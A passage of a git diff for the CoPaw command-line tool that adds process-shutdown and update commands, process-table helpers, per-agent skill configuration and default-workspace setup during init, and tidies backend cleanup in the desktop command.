-                    "[desktop] HTTP ready, creating webview window...",
-                )
+                logger.info("HTTP ready, creating webview window...")
                 api = WebViewAPI()
                 webview.create_window(
                     "CoPaw Desktop",
                     url,
@@ -176,36 +180,90 @@
                     text_select=True,
                     js_api=api,
                 )
-                _log_desktop(
-                    "[desktop] Calling webview.start() "
-                    "(blocks until closed)...",
+                logger.info(
+                    "Calling webview.start() (blocks until closed)...",
                 )
                 webview.start(
                     private_mode=False,
                 )  # blocks until user closes the window
-                _log_desktop(
-                    "[desktop] webview.start() returned (window closed).",
+                logger.info("webview.start() returned (window closed).")
+            else:
+                logger.error("Server did not become ready in time.")
+                click.echo(
+                    "Server did not become ready in time; open manually: "
+                    + url,
+                    err=True,
                 )
-                proc.terminate()
-                proc.wait()
-                return  # normal exit after user closed window
-            _log_desktop("[desktop] Server did not become ready in time.")
-            click.echo(
-                "Server did not become ready in time; open manually: " + url,
-                err=True,
+            try:
+                proc.wait()
+            except KeyboardInterrupt:
+                pass  # will be handled in finally
+        finally:
+            # Ensure backend process is always cleaned up
+            # Wrap all cleanup operations to handle race conditions:
+            # - Process may exit between poll() and terminate()
+            # - terminate()/kill() may raise ProcessLookupError/OSError
+            # - We must not let cleanup exceptions mask the original error
+            if proc and proc.poll() is None:  # process still running
+                logger.info("Terminating backend server...")
+                manually_terminated = (
+                    True  # Mark that we're intentionally terminating
+                )
+                try:
+                    proc.terminate()
+                    try:
+                        proc.wait(timeout=5.0)
+                        logger.info("Backend server terminated cleanly.")
+                    except subprocess.TimeoutExpired:
+                        logger.warning(
+                            "Backend did not exit in 5s, force killing...",
+                        )
+                        try:
+                            proc.kill()
+                            proc.wait()
+                            logger.info("Backend server force killed.")
+                        except (ProcessLookupError, OSError) as e:
+                            # Process already exited, which is fine
+                            logger.debug(
+                                f"kill() raised {e.__class__.__name__} "
+                                f"(process already exited)",
+                            )
+                except (ProcessLookupError, OSError) as e:
+                    # Process already exited between poll() and terminate()
+                    logger.debug(
+                        f"terminate() raised {e.__class__.__name__} "
+                        f"(process already exited)",
+                    )
+            elif proc:
+                logger.info(
+                    f"Backend already exited with code {proc.returncode}",
+                )
+
+            # Only report errors if process exited unexpectedly
+            # (not manually terminated)
+            # On Windows, terminate() doesn't use signals so exit codes vary
+            # (1, 259, etc.)
+            # On Unix/Linux/macOS, terminate() sends SIGTERM (exit code -15)
+            # Using a flag is more reliable than checking specific exit codes
+            if proc and proc.returncode != 0 and not manually_terminated:
+                logger.error(
+                    f"Backend process exited unexpectedly with code "
+                    f"{proc.returncode}",
                 )
-        try:
-            proc.wait()
-        except KeyboardInterrupt:
-            proc.terminate()
-            proc.wait()
-
-        if proc.returncode != 0:
-            sys.exit(proc.returncode or 1)
+                # Follow POSIX convention for exit codes:
+                # - Negative (signal): 128 + signal_number
+                # - Positive (normal): use as-is
+                # Example: -15 (SIGTERM) -> 143 (128+15), -11 (SIGSEGV) ->
+                # 139 (128+11)
+                if proc.returncode < 0:
+                    sys.exit(128 + abs(proc.returncode))
+                else:
+                    sys.exit(proc.returncode or 1)
+    except KeyboardInterrupt:
+        logger.warning("KeyboardInterrupt in main, cleaning up...")
+        raise
     except Exception as e:
-        _log_desktop(f"[desktop] Exception: {e!r}")
-        import traceback
-
+        logger.error(f"Exception: {e!r}")
         traceback.print_exc(file=sys.stderr)
         sys.stderr.flush()
         raise
diff --git a/src/copaw/cli/init_cmd.py b/src/copaw/cli/init_cmd.py
index ace9dca3a..9934d362b 100644
--- a/src/copaw/cli/init_cmd.py
+++ b/src/copaw/cli/init_cmd.py
@@ -25,6 +25,7 @@
 )
 from ..constant import HEARTBEAT_DEFAULT_EVERY
 from ..providers import ProviderManager
+from ..constant import WORKING_DIR

 SECURITY_WARNING = """
 Security warning — please read.
@@ -140,6 +141,9 @@ def init_cmd(
     accept_security: bool,
 ) -> None:
     """Create working dir with config.json and HEARTBEAT.md (interactive)."""
+    from pathlib import Path
+    from ..app.migration import ensure_default_agent_exists
+
     config_path = get_config_path()
     working_dir = config_path.parent
     heartbeat_path = get_heartbeat_query_path()
@@ -184,6 +188,14 @@ def init_cmd(
     else:
         mark_telemetry_collected(working_dir)

+    # --- Ensure default agent workspace exists ---
+    click.echo("\n=== Default Workspace Initialization ===")
+    ensure_default_agent_exists()
+    click.echo("✓ Default workspace initialized")
+
+    # Get default workspace path for subsequent operations
+    default_workspace = Path(f"{WORKING_DIR}/workspaces/default").expanduser()
+
     # --- config.json ---
     write_config = True
     if config_path.is_file() and not force and not use_defaults:
@@ -242,6 +254,11 @@ def init_cmd(
         existing = (
             load_config(config_path) if config_path.is_file() else Config()
         )
+        # Ensure agents.defaults exists
+        if existing.agents.defaults is None:
+            from ..config.config import AgentsDefaultsConfig
+
+            existing.agents.defaults = AgentsDefaultsConfig()
         existing.agents.defaults.heartbeat = hb

     # --- show_tool_details ---
@@ -262,6 +279,32 @@ def init_cmd(
         )
         existing.agents.language = language

+    # --- audio mode selection ---
+    if not use_defaults:
+        audio_mode = prompt_choice(
+            "Select audio mode for voice messages:\n"
+            "  auto   - transcribe if provider available, else file placeholder\n"
+            "  native - send audio directly to model (needs ffmpeg)\n"
+            "Audio mode:",
+            options=["auto", "native"],
+            default=existing.agents.audio_mode,
+        )
+        existing.agents.audio_mode = audio_mode
+
+    # --- transcription provider type selection ---
+    if not use_defaults and audio_mode != "native":
+        provider_type = prompt_choice(
+            "Select transcription provider:\n"
+            "  disabled      - no transcription\n"
+            "  whisper_api   - remote Whisper API endpoint\n"
+            "  local_whisper - locally installed openai-whisper\n"
+            "                  (requires ffmpeg + openai-whisper)\n"
+            "Provider:",
+            options=["disabled", "whisper_api", "local_whisper"],
+            default=existing.agents.transcription_provider_type,
+        )
+        existing.agents.transcription_provider_type = provider_type
+
     # --- channels (interactive when not --defaults) ---
     if not use_defaults and prompt_confirm(
         "Configure channels? "
@@ -306,6 +349,7 @@ def init_cmd(
         click.echo("Enabling all skills by default (skip existing)...")

         synced, skipped = sync_skills_to_working_dir(
+            workspace_dir=default_workspace,
             skill_names=None,
             force=False,
         )
@@ -328,6 +372,7 @@ def init_cmd(
         click.echo("Enabling all skills...")

         synced, skipped = sync_skills_to_working_dir(
+            workspace_dir=default_workspace,
             skill_names=None,
             force=False,
         )
@@ -351,14 +396,20 @@ def init_cmd(
     from ..agents.utils import copy_md_files

     config = load_config(config_path) if config_path.is_file() else Config()
-    current_language = config.agents.language
+    current_language = (
+        config.agents.language or "zh"
+    )  # Default to "zh" if None
     installed_language = config.agents.installed_md_files_language

     if use_defaults:
         # --defaults: always attempt copy, skip files that already exist
-        # in WORKING_DIR (handles freshly mounted empty volumes).
+        # in default workspace (handles freshly mounted empty volumes).
         click.echo(f"\nChecking MD files [language: {current_language}]...")
-        copied = copy_md_files(current_language, skip_existing=True)
+        copied = copy_md_files(
+            current_language,
+            skip_existing=True,
+            workspace_dir=default_workspace,
+        )
         if copied:
             config.agents.installed_md_files_language = current_language
             save_config(config, config_path)
@@ -373,7 +424,10 @@ def init_cmd(
         click.echo(
             f"Language changed: {installed_language} → {current_language}",
         )
-        copied = copy_md_files(current_language)
+        copied = copy_md_files(
+            current_language,
+            workspace_dir=default_workspace,
+        )
         if copied:
             config.agents.installed_md_files_language = current_language
             save_config(config, config_path)
diff --git a/src/copaw/cli/main.py b/src/copaw/cli/main.py
index 04fcb9c8e..8db5014a8 100644
--- a/src/copaw/cli/main.py
+++ b/src/copaw/cli/main.py
@@ -101,6 +101,21 @@ def _record(label: str, elapsed: float) -> None:

 _record(".desktop_cmd", time.perf_counter() - _t)

+_t = time.perf_counter()
+from .update_cmd import update_cmd  # noqa: E402
+
+_record(".update_cmd", time.perf_counter() - _t)
+
+_t = time.perf_counter()
+from .shutdown_cmd import shutdown_cmd  # noqa: E402
+
+_record(".shutdown_cmd", time.perf_counter() - _t)
+
+_t = time.perf_counter()
+from .auth_cmd import auth_group  # noqa: E402
+
+_record(".auth_cmd", time.perf_counter() - _t)
+
 _total = time.perf_counter() - _t0_main
 _init_timings.append(("(total imports)", _total))
 logger.debug("%.3fs (total imports)", _total)
@@ -152,3 +167,6 @@ def cli(ctx: click.Context, host: str | None, port: int | None) -> None:
 cli.add_command(skills_group)
 cli.add_command(uninstall_cmd)
 cli.add_command(desktop_cmd)
+cli.add_command(update_cmd)
+cli.add_command(shutdown_cmd)
+cli.add_command(auth_group)
diff --git a/src/copaw/cli/process_utils.py b/src/copaw/cli/process_utils.py
new file mode 100644
index 000000000..fabbdc100
--- /dev/null
+++ b/src/copaw/cli/process_utils.py
@@ -0,0 +1,236 @@
+# -*- coding: utf-8 -*-
+from __future__ import annotations
+
+import csv
+import io
+import json
+import re
+import subprocess
+import sys
+from typing import Optional
+
+
+_PORT_ARG_PATTERN = re.compile(r"(?:^|\s)--port(?:=|\s+)(\d+)(?=\s|$)")
+
+
+def _coerce_optional_int(value: object) -> Optional[int]:
+    """Best-effort conversion of JSON-decoded values to integers."""
+    if value is None:
+        return None
+    if isinstance(value, int):
+        return value
+    if isinstance(value, str):
+        try:
+            return int(value)
+        except ValueError:
+            return None
+    return None
+
+
+def _parse_windows_process_snapshot_json(
+    payload: str,
+) -> dict[int, tuple[Optional[int], str, str]]:
+    """Parse PowerShell JSON process snapshot output."""
+    if not payload.strip():
+        return {}
+
+    try:
+        data = json.loads(payload)
+    except json.JSONDecodeError:
+        return {}
+
+    rows = data if isinstance(data, list) else [data]
+    snapshot: dict[int, tuple[Optional[int], str, str]] = {}
+    for row in rows:
+        if not isinstance(row, dict):
+            continue
+
+        pid_value = row.get("ProcessId")
+        parent_value = row.get("ParentProcessId")
+        pid = _coerce_optional_int(pid_value)
+        if pid is None:
+            continue
+
+        parent_pid = _coerce_optional_int(parent_value)
+
+        name = str(row.get("Name") or "")
+        command = str(row.get("CommandLine") or "")
+        snapshot[pid] = (parent_pid, name, command)
+    return snapshot
+
+
+def _parse_windows_process_snapshot_csv(
+    payload: str,
+) -> dict[int, tuple[Optional[int], str, str]]:
+    """Parse WMIC CSV process snapshot output."""
+    if not payload.strip():
+        return {}
+
+    snapshot: dict[int, tuple[Optional[int], str, str]] = {}
+    reader = csv.DictReader(io.StringIO(payload))
+    for row in reader:
+        pid_value = (row.get("ProcessId") or "").strip()
+        if not pid_value.isdigit():
+            continue
+
+        parent_value = (row.get("ParentProcessId") or "").strip()
+        parent_pid = int(parent_value) if parent_value.isdigit() else None
+        pid = int(pid_value)
+        name = (row.get("Name") or "").strip()
+        command = (row.get("CommandLine") or "").strip()
+        snapshot[pid] = (parent_pid, name, command)
+    return snapshot
+
+
+def _windows_process_snapshot() -> dict[int, tuple[Optional[int], str, str]]:
+    """Return Windows process info as pid -> (parent_pid, name, cmdline)."""
+    commands = (
+        (
+            [
+                "powershell",
+                "-NoProfile",
+                "-Command",
+                (
+                    "Get-CimInstance Win32_Process | "
+                    "Select-Object ProcessId,ParentProcessId,Name,"
+                    "CommandLine | ConvertTo-Json -Compress"
+                ),
+            ],
+            _parse_windows_process_snapshot_json,
+        ),
+        (
+            [
+                "wmic",
+                "process",
+                "get",
+                "ProcessId,ParentProcessId,Name,CommandLine",
+                "/FORMAT:CSV",
+            ],
+            _parse_windows_process_snapshot_csv,
+        ),
+    )
+
+    for command, parser in commands:
+        try:
+            result = subprocess.run(
+                command,
+                capture_output=True,
+                text=True,
+                timeout=15,
+                check=False,
+            )
+        except (OSError, subprocess.TimeoutExpired):
+            continue
+
+        snapshot = parser(result.stdout or "")
+        if snapshot:
+            return snapshot
+    return {}
+
+
+def _process_table() -> list[tuple[int, str]]:
+    """Return a best-effort process table as (pid, command line)."""
+    if sys.platform == "win32":
+        return [
+            (pid, command or name or "")
+            for pid, (
+                _parent_pid,
+                name,
+                command,
+            ) in _windows_process_snapshot().items()
+        ]
+
+    try:
+        result = subprocess.run(
+            ["ps", "-ax", "-o", "pid=", "-o", "command="],
+            capture_output=True,
+            text=True,
+            timeout=10,
+            check=False,
+        )
+    except (OSError, subprocess.TimeoutExpired):
+        return []
+
+    rows: list[tuple[int, str]] = []
+    for line in (result.stdout or "").splitlines():
+        stripped = line.strip()
+        if not stripped:
+            continue
+        parts = stripped.split(None, 1)
+        if not parts or not parts[0].isdigit():
+            continue
+        command = parts[1] if len(parts) > 1 else ""
+        rows.append((int(parts[0]), command))
+    return rows
+
+
+def _matches_copaw_cli_command(command: str, *subcommands: str) -> bool:
+    """Return whether command line looks like a CoPaw CLI invocation."""
+    lowered = f" {command.lower()}"
+    return any(
+        pattern in lowered
+        for subcommand in subcommands
+        for pattern in (
+            f" -m copaw {subcommand}",
+            f" copaw {subcommand}",
+            f"__main__.py {subcommand}",
+            f'copaw.exe" {subcommand}',
+            f"copaw.exe {subcommand}",
+        )
+    )
+
+
+def _is_copaw_service_command(command: str) -> bool:
+    """Return whether the command line looks like a local CoPaw app."""
+    return _matches_copaw_cli_command(command, "app")
+
+
+def _is_copaw_wrapper_process(name: str, command: str) -> bool:
+    """Return whether the process looks like a CoPaw CLI wrapper."""
+    lowered_name = name.lower().removesuffix(".exe")
+    return lowered_name == "copaw" or _matches_copaw_cli_command(
+        command,
+        "app",
+        "desktop",
+    )
+
+
+def _extract_port_from_command(command: str, default: int = 8088) -> int:
+    """Extract `--port` from a command line when present."""
+    match = _PORT_ARG_PATTERN.search(command)
+    return int(match.group(1)) if match else default
+
+
+def _base_url(host: str, port: int) -> str:
+    """Build a base URL from host and port."""
+    normalized_host = host.strip()
+    if ":" in normalized_host and not normalized_host.startswith("["):
+        normalized_host = f"[{normalized_host}]"
+    return f"http://{normalized_host}:{port}"
+
+
+def _candidate_hosts(host: str | None) -> list[str]:
+    """Return host variants that can reach a local CoPaw service."""
+    if not host:
+        return []
+
+    normalized = host.strip()
+    lowered = normalized.lower().strip("[]")
+    candidates: list[str] = []
+
+    def _add(value: str) -> None:
+        if value and value not in candidates:
+            candidates.append(value)
+
+    if lowered in {"0.0.0.0", "::"}:
+        _add("127.0.0.1")
+        _add("localhost")
+        if lowered == "::":
+            _add("::1")
+    elif lowered == "localhost":
+        _add("localhost")
+        _add("127.0.0.1")
+        _add("::1")
+
+    _add(normalized)
+    return candidates
diff --git a/src/copaw/cli/providers_cmd.py b/src/copaw/cli/providers_cmd.py
index ef72d0ed9..85ee03710 100644
--- a/src/copaw/cli/providers_cmd.py
+++ b/src/copaw/cli/providers_cmd.py
@@ -60,7 +60,7 @@ def _get_ollama_host() -> str:
     manager = _manager()
     provider = manager.get_provider("ollama")
     if provider is None or not provider.base_url:
-        return "http://localhost:11434"
+        return "http://127.0.0.1:11434"
     return provider.base_url
diff --git a/src/copaw/cli/shutdown_cmd.py b/src/copaw/cli/shutdown_cmd.py
new file mode 100644
index 000000000..127cbdda3
--- /dev/null
+++ b/src/copaw/cli/shutdown_cmd.py
@@ -0,0 +1,382 @@
+# -*- coding: utf-8 -*-
+from __future__ import annotations
+
+import os
+import signal
+import subprocess
+import sys
+import time
+from pathlib import Path
+from typing import Optional
+
+import click
+
+from .process_utils import (
+    _is_copaw_wrapper_process,
+    _process_table,
+    _windows_process_snapshot,
+)
+
+
+_PROJECT_ROOT = Path(__file__).resolve().parents[3]
+_CONSOLE_DIR = (_PROJECT_ROOT / "console").resolve()
+_SIGTERM = signal.SIGTERM
+_SIGKILL = getattr(signal, "SIGKILL", _SIGTERM)
+
+
+def _backend_port(ctx: click.Context, port: Optional[int]) -> int:
+    """Resolve backend port from explicit option or global CLI context."""
+    if port is not None:
+        return port
+    return int((ctx.obj or {}).get("port", 8088))
+
+
+def _listening_pids_for_port(port: int) -> set[int]:
+    """Return PIDs currently listening on the given TCP port."""
+    if sys.platform == "win32":
+        try:
+            result = subprocess.run(
+                ["netstat", "-ano", "-p", "tcp"],
+                capture_output=True,
+                text=True,
+                timeout=10,
+                check=False,
+            )
+        except (OSError, subprocess.TimeoutExpired):
+            return set()
+
+        pids: set[int] = set()
+        suffix = f":{port}"
+        for line in (result.stdout or "").splitlines():
+            parts = line.split()
+            if len(parts) < 5:
+                continue
+            local_addr = parts[1]
+            state = parts[3].upper()
+            if not local_addr.endswith(suffix) or state != "LISTENING":
+                continue
+            try:
+                pids.add(int(parts[4]))
+            except ValueError:
+                continue
+        return pids
+
+    commands = (
+        ["lsof", "-nP", f"-iTCP:{port}", "-sTCP:LISTEN", "-t"],
+        ["fuser", f"{port}/tcp"],
+    )
+    for command in commands:
+        try:
+            result = subprocess.run(
+                command,
+                capture_output=True,
+                text=True,
+                timeout=10,
+                check=False,
+            )
+        except (OSError, subprocess.TimeoutExpired):
+            continue
+
+        pids = {
+            int(token)
+            for token in (result.stdout or "").split()
+            if token.isdigit()
+        }
+        if pids:
+            return pids
+    return set()
+
+
+def _find_frontend_dev_pids() -> set[int]:
+    """Find Vite dev-server processes for this repository's console app."""
+    console_dir = str(_CONSOLE_DIR).lower()
+    matches: set[int] = set()
+    for pid, command in _process_table():
+        lowered = command.lower()
+        if "vite" in lowered and console_dir in lowered:
+            matches.add(pid)
+            continue
+        if "copaw-console" in lowered and (
+            "npm" in lowered
+            or "pnpm" in lowered
+            or "yarn" in lowered
+            or "node" in lowered
+        ):
+            matches.add(pid)
+    return matches
+
+
+def _find_desktop_wrapper_pids() -> set[int]:
+    """Find `copaw desktop` wrapper processes for this project."""
+    matches: set[int] = set()
+    patterns = (
+        " -m copaw desktop",
+        " copaw desktop",
+        "__main__.py desktop",
+    )
+    for pid, command in _process_table():
+        lowered = f" {command.lower()}"
+        if any(pattern in lowered for pattern in patterns):
+            matches.add(pid)
+    return matches
+
+
+def _find_windows_wrapper_ancestor_pids(pids: set[int]) -> set[int]:
+    """Find CoPaw wrapper/supervisor ancestors for Windows backend PIDs."""
+    if sys.platform != "win32" or not pids:
+        return set()
+
+    snapshot = _windows_process_snapshot()
+    matches: set[int] = set()
+    for pid in pids:
+        visited: set[int] = set()
+        current_pid = pid
+        while True:
+            info = snapshot.get(current_pid)
+            if info is None:
+                break
+
+            parent_pid = info[0]
+            if parent_pid in (None, 0) or parent_pid in visited:
+                break
+            visited.add(parent_pid)
+
+            parent_info = snapshot.get(parent_pid)
+            if parent_info is None:
+                break
+
+            if _is_copaw_wrapper_process(parent_info[1], parent_info[2]):
+                matches.add(parent_pid)
+
+            current_pid = parent_pid
+    return matches
+
+
+def _child_pids_unix(pid: int) -> set[int]:
+    """Recursively collect child PIDs for Unix-like systems."""
+    children: set[int] = set()
+    stack = [pid]
+    while stack:
+        current = stack.pop()
+        try:
+            result = subprocess.run(
+                ["pgrep", "-P", str(current)],
+                capture_output=True,
+                text=True,
+                timeout=5,
+                check=False,
+            )
+        except (OSError, subprocess.TimeoutExpired):
+            continue
+        for token in (result.stdout or "").split():
+            if not token.isdigit():
+                continue
+            child = int(token)
+            if child in children:
+                continue
+            children.add(child)
+            stack.append(child)
+    return children
+
+
+def _pid_exists(pid: int) -> bool:
+    """Return whether the PID still exists."""
+    if pid <= 0:
+        return False
+    if sys.platform == "win32":
+        return pid in _windows_process_snapshot()
+    try:
+        os.kill(pid, 0)
+    except OSError:
+        return False
+    return True
+
+
+def _wait_for_pid_exit(
+    pid: int,
+    timeout_sec: float,
+    interval_sec: float,
+) -> bool:
+    """Wait until a PID exits within the given timeout."""
+    deadline = time.monotonic() + timeout_sec
+    while time.monotonic() < deadline:
+        if not _pid_exists(pid):
+            return True
+        time.sleep(interval_sec)
+    return not _pid_exists(pid)
+
+
+def _signal_process_tree_unix(pid: int, sig: signal.Signals) -> None:
+    """Send a signal to a Unix process and its descendants."""
+    descendants = sorted(_child_pids_unix(pid), reverse=True)
+    for child_pid in descendants:
+        try:
+            os.kill(child_pid, sig)
+        except OSError:
+            continue
+    try:
+        os.kill(pid, sig)
+    except OSError:
+        pass
+
+
+def _terminate_process_tree_windows(pid: int, force: bool = False) -> None:
+    """Terminate a Windows process tree."""
+    command = ["taskkill", "/T", "/PID", str(pid)]
+    if force:
+        command.insert(1, "/F")
+    try:
+        subprocess.run(
+            command,
+            capture_output=True,
+            text=True,
+            timeout=10,
+            check=False,
+        )
+    except (OSError, subprocess.TimeoutExpired):
+        pass
+
+
+def _force_terminate_windows_process(pid: int) -> None:
+    """Force terminate a Windows process as a fallback."""
+    commands = (
+        [
+            "powershell",
+            "-NoProfile",
+            "-Command",
+            (
+                "$ErrorActionPreference='SilentlyContinue'; "
+                f"Stop-Process -Id {pid} -Force"
+            ),
+        ],
+        ["taskkill", "/F", "/PID", str(pid)],
+    )
+    for command in commands:
+        try:
+            subprocess.run(
+                command,
+                capture_output=True,
+                text=True,
+                timeout=10,
+                check=False,
+            )
+        except (OSError, subprocess.TimeoutExpired):
+            continue
+
+
+def _terminate_pid(pid: int, timeout_sec: float = 5.0) -> bool:
+    """Terminate a process tree gracefully, then force kill if needed."""
+    if not _pid_exists(pid):
+        return True
+
+    if sys.platform == "win32":
+        _terminate_process_tree_windows(pid)
+    else:
+        _signal_process_tree_unix(pid, _SIGTERM)
+
+    if _wait_for_pid_exit(pid, timeout_sec, 0.2):
+        return True
+
+    if sys.platform == "win32":
+        _terminate_process_tree_windows(pid, force=True)
+        if _wait_for_pid_exit(pid, 2.0, 0.1):
+            return True
+        _force_terminate_windows_process(pid)
+    else:
+        _signal_process_tree_unix(pid, _SIGKILL)
+
+    return _wait_for_pid_exit(pid, 2.0, 0.1)
+
+
+def _stop_pid_set(pids: set[int]) -> tuple[list[int], list[int]]:
+    """Stop a set of PIDs and return (stopped, failed)."""
+    stopped: list[int] = []
+    failed: list[int] = []
+    for pid in sorted(pids):
+        if _terminate_pid(pid):
+            stopped.append(pid)
+        else:
+            failed.append(pid)
+    return stopped, failed
+
+
+@click.command("shutdown", help="Force stop the running CoPaw app processes.")
+@click.option(
+    "--port",
+    default=None,
+    type=int,
+    help="Backend port to stop. Defaults to global --port from config.",
+)
+@click.pass_context
+def shutdown_cmd(ctx: click.Context, port: Optional[int]) -> None:
+    """Stop the running CoPaw app processes.
+
+    `copaw app` only starts the backend process. The web console is normally
+    static files served by that backend. During frontend development, a
+    separate Vite process may also be running from the repository's
+    `console/` directory, and this command will stop that as well.
+    """
+    backend_port = _backend_port(ctx, port)
+    backend_pids = _listening_pids_for_port(backend_port)
+    frontend_pids = _find_frontend_dev_pids()
+    desktop_pids = _find_desktop_wrapper_pids()
+    wrapper_pids = _find_windows_wrapper_ancestor_pids(backend_pids)
+
+    # Build a process table for logging.
+    proc_table = dict(_process_table())
+
+    def log_pid_set(title: str, pids: set[int]) -> None:
+        if not pids:
+            click.echo(f"{title}: nothing to stop")
+            return
+        click.echo(f"{title} ({len(pids)} total):")
+        for pid in sorted(pids):
+            cmd = proc_table.get(pid, "")
+            click.echo(f"  PID {pid}: {cmd}")
+
+    log_pid_set("Backend listener processes", backend_pids)
+    log_pid_set("Frontend development processes", frontend_pids)
+    log_pid_set("Desktop wrapper processes", desktop_pids)
+    log_pid_set("Related wrapper processes", wrapper_pids)
+
+    all_targets = backend_pids | frontend_pids | desktop_pids | wrapper_pids
+    if not all_targets:
+        raise click.ClickException(
+            "No running CoPaw backend/frontend process was found.",
+        )
+
+    wrapper_stopped, wrapper_failed = _stop_pid_set(wrapper_pids)
+    frontend_stopped, frontend_failed = _stop_pid_set(frontend_pids)
+    desktop_stopped, desktop_failed = _stop_pid_set(
+        desktop_pids - set(wrapper_stopped) - set(frontend_stopped),
+    )
+    backend_stopped, backend_failed = _stop_pid_set(
+        backend_pids
+        - set(wrapper_stopped)
+        - set(frontend_stopped)
+        - set(desktop_stopped),
+    )
+
+    stopped = (
+        wrapper_stopped + frontend_stopped + desktop_stopped + backend_stopped
+    )
+    failed = list(
+        set(
+            wrapper_failed + frontend_failed + desktop_failed + backend_failed,
+        ),
+    )
+
+    if stopped:
+        click.echo(
+            "Stopped CoPaw processes: "
+            + ", ".join(str(pid) for pid in sorted(stopped)),
+        )
+    if failed:
+        click.echo("Failed to stop the following processes:")
+        for pid in sorted(failed):
+            cmd = proc_table.get(pid, "")
+            click.echo(f"  PID {pid}: {cmd}")
+        raise click.ClickException(
+            "Failed to shut down process(es): "
+            + ", ".join(str(pid) for pid in sorted(failed)),
+        )
diff --git a/src/copaw/cli/skills_cmd.py b/src/copaw/cli/skills_cmd.py
index 4c4e15eb1..5a6221302 100644
--- a/src/copaw/cli/skills_cmd.py
+++ b/src/copaw/cli/skills_cmd.py
@@ -2,21 +2,47 @@
 """CLI skill: list and interactively enable/disable skills."""
 from __future__ import annotations

+from pathlib import Path
+
 import click

 from ..agents.skills_manager import SkillService, list_available_skills
+from ..constant import WORKING_DIR
+from ..config import load_config
 from .utils import prompt_checkbox, prompt_confirm


+def _get_agent_workspace(agent_id: str) -> Path:
+    """Get agent workspace directory."""
+    try:
+        config = load_config()
+        if agent_id in config.agents.profiles:
+            ref = config.agents.profiles[agent_id]
+            workspace_dir = Path(ref.workspace_dir).expanduser()
+            return workspace_dir
+    except Exception:
+        pass
+    return WORKING_DIR
+
+
 # pylint: disable=too-many-branches
-def configure_skills_interactive() -> None:
+def configure_skills_interactive(
+    agent_id: str = "default",
+    working_dir: Path | None = None,
+) -> None:
     """Interactively select which skills to enable (multi-select)."""
-    all_skills = SkillService.list_all_skills()
+    if working_dir is None:
+        working_dir = _get_agent_workspace(agent_id)
+
+    click.echo(f"Configuring skills for agent: {agent_id}\n")
+
+    skill_service = SkillService(working_dir)
+    all_skills = skill_service.list_all_skills()
     if not all_skills:
         click.echo("No skills found. Nothing to configure.")
         return

-    available = set(list_available_skills())
+    available = set(list_available_skills(working_dir))
     all_names = {s.name for s in all_skills}

     # Default to all skills if nothing is currently active (first time)
@@ -78,7 +104,7 @@ def configure_skills_interactive() -> None:

     # Apply changes
     for name in to_enable:
-        result = SkillService.enable_skill(name)
+        result = skill_service.enable_skill(name)
         if result:
             click.echo(f"  ✓ Enabled: {name}")
         else:
@@ -87,7 +113,7 @@ def configure_skills_interactive() -> None:
             )

     for name in to_disable:
-        result = SkillService.disable_skill(name)
+        result = skill_service.disable_skill(name)
         if result:
             click.echo(f"  ✓ Disabled: {name}")
         else:
@@ -104,10 +130,20 @@ def skills_group() -> None:


 @skills_group.command("list")
-def list_cmd() -> None:
+@click.option(
+    "--agent-id",
+    default="default",
+    help="Agent ID (defaults to 'default')",
+)
+def list_cmd(agent_id: str) -> None:
     """Show all skills and their enabled/disabled status."""
-    all_skills = SkillService.list_all_skills()
-    available = set(list_available_skills())
+    working_dir = _get_agent_workspace(agent_id)
+
+    click.echo(f"Skills for agent: {agent_id}\n")
+
+    skill_service = SkillService(working_dir)
+    all_skills = skill_service.list_all_skills()
+    available = set(list_available_skills(working_dir))

     if not all_skills:
         click.echo("No skills found.")
@@ -135,5 +171,11 @@ def list_cmd() -> None:


 @skills_group.command("config")
-def configure_cmd() -> None:
-    configure_skills_interactive()
+@click.option(
+    "--agent-id",
+    default="default",
+    help="Agent ID (defaults to 'default')",
+)
+def configure_cmd(agent_id: str) -> None:
+    """Interactively configure skills."""
+    configure_skills_interactive(agent_id=agent_id)
diff --git a/src/copaw/cli/update_cmd.py b/src/copaw/cli/update_cmd.py
new file mode 100644
index 000000000..c53d2881b
--- /dev/null
+++ b/src/copaw/cli/update_cmd.py
@@ -0,0 +1,729 @@
+# -*- coding: utf-8 -*-
+from __future__ import annotations
+
+import json
+import os
+import signal
+import shutil
+import subprocess
+import sys
+import time
+from dataclasses import asdict, dataclass
+from importlib import metadata
+from pathlib import Path
+from typing import Any
+from urllib.parse import urlparse
+
+import click
+import httpx
+from packaging.version import InvalidVersion, Version
+
+from ..__version__ import __version__
+from ..constant import WORKING_DIR
+from ..config.utils import read_last_api
+from .process_utils import (
+    _base_url,
+    _candidate_hosts,
+    _extract_port_from_command,
+    _is_copaw_service_command,
+    _process_table,
+)
+
+_PYPI_JSON_URL = "https://pypi.org/pypi/copaw/json"
+
+
+def _subprocess_text_kwargs() -> dict[str, Any]:
+    """Return robust text-decoding settings for subprocess output.
+
+    Package installers may emit UTF-8 regardless of the active Windows code
+    page. Using replacement for undecodable bytes prevents the update worker
+    from crashing while streaming output.
+    """
+    return {
+        "text": True,
+        "encoding": "utf-8",
+        "errors": "replace",
+    }
+
+
+@dataclass(frozen=True)
+class InstallInfo:
+    """Information about the current CoPaw installation."""
+
+    package_dir: str
+    python_executable: str
+    environment_root: str
+    environment_kind: str
+    installer: str
+    source_type: str
+    source_url: str | None = None
+
+
+@dataclass(frozen=True)
+class RunningServiceInfo:
+    """Detected CoPaw service endpoint state."""
+
+    is_running: bool
+    base_url: str | None = None
+    version: str | None = None
+
+
+def _version_obj(version: str) -> Any:
+    """Parse version when possible; otherwise keep the raw string."""
+    try:
+        return Version(version)
+    except InvalidVersion:
+        return version
+
+
+def _is_newer_version(latest: str, current: str) -> bool | None:
+    """Return whether latest is newer than current.
+
+    Returns `None` when either version cannot be compared reliably.
+    """
+    parsed_latest = _version_obj(latest)
+    parsed_current = _version_obj(current)
+    if isinstance(parsed_latest, str) or isinstance(parsed_current, str):
+        if latest == current:
+            return False
+        return None
+    return parsed_latest > parsed_current
+
+
+def _fetch_latest_version() -> str:
+    """Fetch the latest published CoPaw version from PyPI."""
+    try:
+        resp = httpx.get(
+            _PYPI_JSON_URL,
+            timeout=10.0,
+            headers={"Accept": "application/json"},
+        )
+        resp.raise_for_status()
+        data = resp.json()
+    except httpx.HTTPError as exc:
+        raise click.ClickException(
+            f"Failed to fetch the latest CoPaw version from PyPI: {exc}",
+        ) from exc
+    except json.JSONDecodeError as exc:
+        raise click.ClickException(
+            "Received an invalid response from PyPI when checking for the "
+            f"latest CoPaw version: {exc}",
+        ) from exc
+    version = str(data.get("info", {}).get("version", "")).strip()
+    if not version:
+        raise click.ClickException(
+            "Unable to determine the latest CoPaw version.",
+        )
+    return version
+
+
